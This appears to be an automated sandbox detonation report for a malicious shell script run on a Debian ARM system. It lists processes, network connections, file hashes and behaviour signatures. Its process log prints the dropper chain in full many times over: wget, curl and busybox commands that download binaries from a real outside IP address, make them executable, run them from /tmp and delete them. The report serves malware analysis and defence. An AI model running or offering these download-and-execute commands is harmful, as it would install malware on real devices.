[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/chmod

[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr

[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/rm

[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/wget

[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/chmod

[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC

[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/rm

[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.21:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:17

Reported

2024-10-25 01:19

Platform

debian9-armhf-20240418-en

Max time kernel

32s

Max time network

33s

Command Line

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC N/A
N/A /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe N/A
N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A
N/A /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV N/A
N/A /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr N/A
N/A /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr N/A
N/A /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC N/A
N/A /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /usr/bin/curl N/A
File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /usr/bin/curl N/A
File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /usr/bin/curl N/A
File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /usr/bin/curl N/A
File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /usr/bin/curl N/A

Processes

/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/chmod

[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/rm

[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/wget

[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/chmod

[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe

[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/rm

[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/chmod

[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB

[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/rm

[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/chmod

[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV

[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/rm

[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/wget

[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/chmod

[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr

[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/rm

[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/wget

[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/chmod

[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr

[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/rm

[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/wget

[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/chmod

[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC

[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/rm

[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/wget

[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/chmod

[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm

[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/rm

[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

